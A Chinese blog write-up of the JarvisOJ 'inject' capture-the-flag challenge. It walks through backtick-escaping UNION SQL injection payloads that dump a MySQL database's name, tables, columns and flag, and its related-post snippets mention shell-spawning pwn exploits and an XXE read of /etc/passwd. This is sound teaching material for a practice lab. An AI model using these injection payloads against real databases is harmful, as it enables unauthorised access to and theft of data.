ctf-jarvisoj

最新推荐文章于 2024-03-28 11:29:55 发布
最新推荐文章于 2024-03-28 11:29:55 发布
阅读量209 收藏 1
点赞数 1
分类专栏: ctf 注入 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45006525/article/details/106528474
版权

题目连接:
(http://web.jarvisoj.com:32794)
拿到题目扫一下目录发现页面源代码
在这里插入图片描述
源码分析
1.

`$table = $_GET['table']?$_GET['table']:"test";`

该代码为三目运算符:条件?结果1,结果2。根据源码判断table=test
2.

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();

该代码为主要代码,分析发现由于table可控,想到在table后边拼接sql语句实现
主要考点在于反引号的作用。对于反引号在sql语句的作用百度发现:反引号 ` 在mysql中是为了区分mysql中的保留字符与普通字符而引入的符号。只是关乎于一个闭合字段的问题。
payload:

test` ` union select database() limit 1,1

拼接后结果为

desc `secret_test` ` union select database() limit 1,1`

注入成功后爆出数据库名:61d300
接下来就是爆数据表:

table=test` ` union select group_concat(table_name) from information_schema.tables where table_schema=0x363164333030 limit 1,1

爆出数据表为:secret_flag,secret_test
爆列名:

test` ` union select group_concat(column_name) from information_schema.columns where table_name=0x7365637265745F666C6167 limit 1,1

爆出列名为:flagUwillNeverKnow
最后爆字段:

test` ` union select group_concat(flagUwillNeverKnow) from secret_flag limit 1,1

获取flag:flag{luckyGame~}

龍66
关注
专栏目录
171227 逆向-JarvisOJ(Shell)
whklhhhh的博客
12-28 949
1625-5 王子昂 总结《2017年12月27日》 【连续第453天总结】 A. JarvisOJ-Shell B. 这个64位的upx+golang真是够折腾人的..首先查壳,发现PEiD直接罢工了,我还纳闷儿,明明都能运行了咋还不是有效的PE文件捏 然后ExeInfoPE才告诉我这货是64位文件拖入IDA发现什么都没识别出来 但是通过区段名能看出来是UPX壳然而掏UPX程序出来却
CTF-RSA-tool 安装全过程
xuhc25的博客
01-22 2467
前提: 安装的机子可以连接外网 机子安装了python2.7 机子安装了pip 1、安装引导 Description CTF-RSA-tool 是一款基于python以及sage的小工具,助不熟悉RSA的CTFer在CTF比赛中快速解决RSA相关的 基本题型 。 Requirements requests gmpy2 pycrypto libnum sagemath(optional) Installation 安装libnum git clone https://github.com/hellman/li
CTFjarvisoj_fm 1
凉水的博客
07-06 545
jarvisoj_fm
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3631
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
CTF-RE-FindPass(Jarvis oj)
SuperGate的博客
12-27 622
分析源代码:  发现cha数组是从src.jpg图片里得到的信息,图片在apk反编译后的asset文件夹里找到。 在strings.xml文件中可以得到fkey的值 接下来就是理清逻辑思路写代码爆破。要注意的是cha数组里面有超过char类型的数据,因此要注意操作不要越界 以下是脚本代码 fil=open('src.jpg','rb') cha=[] fil.seek(0,0)...
Jarvisoj刷题笔记(CTF Basic题)
Arthur_WangYu的博客
10-01 662
某天A君的网站被日,管理员密码被改,死活登不上,去数据库一看,啥,这密码md5不是和原来一样吗?为啥登不上咧?d78b6f302l25cdc811adfe8d4e7c9fd34 请提交PCTF{原来的管理员密码}
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 866
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
XXE漏洞学习之CTF
qq_46085232的博客
04-09 622
两道有关XXE的CTF题目盲猜过程总结Vulnhub练习题过程总结 盲猜 题目地址:http://web.jarvisoj.com:9882/ 过程 访问题目地址 提交数据,进行抓包 看到数据提交这里,以为是基于json格式的sql注入,结果不是的,看页面源代码也看不出啥的,只怪自己的太菜。后来,才知道这里靠xxe漏洞,盲猜服务端能接受xml格式数据,修改Content-tpye值,并提交xml格式的playload。 修改数据包,进行提交,获取flag(这里我通过读取etc/passwd知道有hom
CTF-CYRPTO-RSA-Recovery
zippo1234的博客
11-20 1232
CTF-CYRPTO-RSA-RecoveryRSA-Recovery题目分析开始1.题目2.分析3.私钥恢复(1)私钥结构(2)恢复原理(3)恢复脚本4.常规套路5.get flag结语 RSA-Recovery 题目分析 私钥恢复 开始 1.题目 给出三个文件: flag.enc、private.corrupted、pubkey.pem 很明显是加密结果、损坏的私钥、公钥。 2.分析 核心在于恢复损坏的私钥。Plaid CTF 2014、Jarvis OJ God Like RSA两题,都与此题类似
Jarvis OJ--level3
Kni9hT's Blog
11-10 250
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
buuctfjarvisoj_level0
最新发布
weixin_54452942的博客
03-28 1115
64位(system_addr+1)的奥秘
JarvisOJ web题目 [61dctf]inject 解题思路----mysql反引号与单引号的区别
__Curtain_
04-12 2451
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
Jarvis OJ web writeup
stepone4ward的博客
04-03 838
1.Login 在响应头中得到了hint 也就是说我们post传入的pass经过了md5加密,我们都知道这种登陆问题最常见的payload就是类似于admin'or 1=1#这种,同理我们只要能找到一个md5加密后符合这种类似格式的语句即可,在实验吧当中也有一道相似的题目,最后的payload为ffifdyop,这个字符串经过md5加密后的结果为 符合上文提到的格式要求,提交后得到flag。 ...
desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup
Ve99tr’s Blog
09-02 1948
题目链接 :http://web.jarvisoj.com:32794/ 描述 进入页面,发现只有 flag{xxx} 题目hint:先找到源码~ 源码泄露 使用后台目录扫描工具御剑进行后台扫描 源码泄露: http://web.jarvisoj.com:32794/index.php~ F12查看器得到泄露的源码 <?php require("config.php"); $ta...
jarvisoj刷题之旅】逆向题目DDCTF - Android Normal的writeup
iqiqiya的博客
09-27 952
Android Normal 下载后输入解压密码进行解压   得到Readme.txt与DDCTF-Normal.apk 将apk载入模拟器运行(顺便吐槽下  蓝叠咋不能竖屏。。。) 输入123456789   出现Wrong   载入jeb  反编译成java代码分析 程序流程很简单   就是一个简单的字符串比较  只不过要对比的字符串放进了native层 这个str...
Jarvis OJ inject(反引号注入)
wywwzjj
02-22 833
http://web.jarvisoj.com:32794/index.php~ 得到源码 &amp;amp;amp;amp;amp;lt;?php require(&amp;amp;amp;amp;quot;config.php&amp;amp;amp;amp;quot;); $table = $_GET['table']?$_GET['table']:&amp;amp;amp;amp;quot;test&amp;amp;amp;amp;quot;;
jarvis OJ WEB题目writeup
weixin_30596735的博客
03-22 779
0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具有公网的计算机去连,我这里用的我的腾讯云服务器去访问的,本地并不能反回正确结果,因为本地私有地址从代理服务器出去后,使用的是代理服务器的端口,这个端口往往不会是51 curl --...
jarvisoj-web-inject
lb821756107的专栏
05-06 249
题目描述: 题目入口:http://web.jarvisoj.com:32794/ Hint1: 先找到源码再说吧~~ 知识点罗列: 1, SQL UNION 操作符合并两个或多个 SELECT 语句的结果。 2,select 执行另一个语句, select(if xxxxxxx) 3,len() 、 length()函数返回文本字段中值的长度。 4,在MySQL中,把 i...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值